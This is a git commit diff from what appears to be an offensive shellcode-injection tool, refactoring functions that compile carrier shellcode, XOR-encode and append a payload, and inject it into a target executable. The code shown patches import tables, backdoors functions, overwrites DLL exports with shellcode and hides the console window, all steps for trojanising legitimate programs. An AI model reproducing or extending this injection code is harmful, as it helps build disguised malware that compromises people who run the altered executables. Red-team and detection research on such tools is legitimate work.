refactor: read shellcode (carrier, payload) directly, no more files

2026-06-03 01:27:11 +00:00 · 2024-05-08 14:34:19 +01:00
parent 012d1253af
commit 3aa79afd70
6 changed files with 41 additions and 47 deletions
@@ -9,9 +9,9 @@ from helper import *
 logger = logging.getLogger("Assembler")


-def asm_to_shellcode(asm_in: FilePath, build_exe: FilePath, shellcode_out: FilePath):
+def asm_to_shellcode(asm_in: FilePath, build_exe: FilePath) -> bytes:
    """Takes ASM source file asm_in, compiles it into build_exe, extracts its code section and write into shellcode_out"""
-    logger.info("--[ Assemble to exe: {} -> {} -> {}".format(asm_in, build_exe, shellcode_out))
+    logger.info("--[ Assemble to exe: {} -> {}".format(asm_in, build_exe))
    run_process_checkret([
        config.get("path_ml64"),
        asm_in,
@@ -22,24 +22,14 @@ def asm_to_shellcode(asm_in: FilePath, build_exe: FilePath, shellcode_out: FileP
    if not os.path.isfile(build_exe):
        raise Exception("Compiling failed")
    code = extract_code_from_exe_file(build_exe)
-    observer.add_code_file("carrier_shc", code) 
-    with open(shellcode_out, 'wb') as f:
-        f.write(code)
+    return code


 def merge_loader_payload(
-        shellcode_in: FilePath, 
-        shellcode_out: FilePath, 
+        shellcode_in: bytes, 
        payload_data: bytes, 
        decoder_style: DecoderStyle
-):
-    logger.info("--[ Merge stager with payload -> {}".format(
-        shellcode_out))
-    observer.add_code_file("payload_shc", payload_data)
-    
-    with open(shellcode_in, 'rb') as input1:
-        data_stager = input1.read()
-
+) -> bytes:
    if decoder_style == DecoderStyle.PLAIN_1:
        # Nothing to do
        pass
@@ -48,12 +38,7 @@ def merge_loader_payload(
        logger.info("---[ XOR payload with key 0x{:X}".format(xor_key))
        payload_data = bytes([byte ^ xor_key for byte in payload_data])

-    logger.info("---[ Size: Stager: {} and Payload: {}  Sum: {} ".format(
-        len(data_stager), len(payload_data), len(data_stager)+len(payload_data)))
+    logger.info("---[ Size: Carrier: {} and Payload: {}  Sum: {} ".format(
+        len(shellcode_in), len(payload_data), len(shellcode_in)+len(payload_data)))

-    with open(shellcode_out, 'wb') as output:
-        # append them
-        data = data_stager + payload_data
-        output.write(data)
-        observer.add_code_file("loader_shc", data) 
-        
+    return shellcode_in + payload_data
@@ -16,25 +16,23 @@ logger = logging.getLogger("Injector")


 def inject_exe(
-    main_shc_path: FilePath,
-    settings: Settings,
-    project: Project,
+    main_shc: bytes,
+    settings: Settings,  # Temp
+    carrier: Carrier,
 ):
-    shellcode_in = project.payload.payload_path
    exe_in = settings.inject_exe_in
    exe_out = settings.inject_exe_out
    carrier_invoke_style: CarrierInvokeStyle = settings.carrier_invoke_style
    source_style: FunctionInvokeStyle = settings.source_style

-    logger.info("--[ Injecting: {} into {} -> {}".format(
-        shellcode_in, exe_in, exe_out
+    logger.info("--[ Injecting: into {} -> {}".format(
+        exe_in, exe_out
    ))

    # Read prepared loader shellcode
    # And check if it fits into the target code section
-    main_shc = file_readall_binary(main_shc_path)
    shellcode_len = len(main_shc)
-    code_sect_size = project.carrier.superpe.get_code_section().Misc_VirtualSize
+    code_sect_size = carrier.superpe.get_code_section().Misc_VirtualSize
    if shellcode_len + 128 > code_sect_size:
        raise Exception("Error: Shellcode {}+128 too small for target code section {}".format(
            shellcode_len, code_sect_size
@@ -46,7 +44,7 @@ def inject_exe(

    # Patch IAT if necessary
    if source_style == FunctionInvokeStyle.iat_reuse:
-        for iatRequest in project.carrier.get_all_iat_requests():
+        for iatRequest in carrier.get_all_iat_requests():
            iat_name = superpe.get_replacement_iat_for("KERNEL32.dll", iatRequest.name)
            superpe.patch_iat_entry("KERNEL32.dll", iat_name, iatRequest.name)

@@ -54,7 +52,7 @@ def inject_exe(

    shellcode_offset: int = 0  # file offset
    if superpe.is_dll() and settings.dllfunc != "" and carrier_invoke_style == CarrierInvokeStyle.ChangeEntryPoint:
-        # Special case. put it at the beginning of the exported DLL function
+        # Special case: DLL exported function direct overwrite
        logger.info("--[ Overwrite DLL function {} with shellcode".format(settings.dllfunc))
        rva = superpe.getExportEntryPoint(settings.dllfunc)

@@ -118,8 +116,8 @@ def inject_exe(
                function_backdoorer.backdoor_function(addr, shellcode_rva, shellcode_len)

        if source_style == FunctionInvokeStyle.iat_reuse:
-            injected_fix_iat(superpe, project.carrier)
-            injected_fix_data(superpe, project.carrier)
+            injected_fix_iat(superpe, carrier)
+            injected_fix_data(superpe, carrier)

    # changes from console to UI (no console window) if necessary
    superpe.patch_subsystem()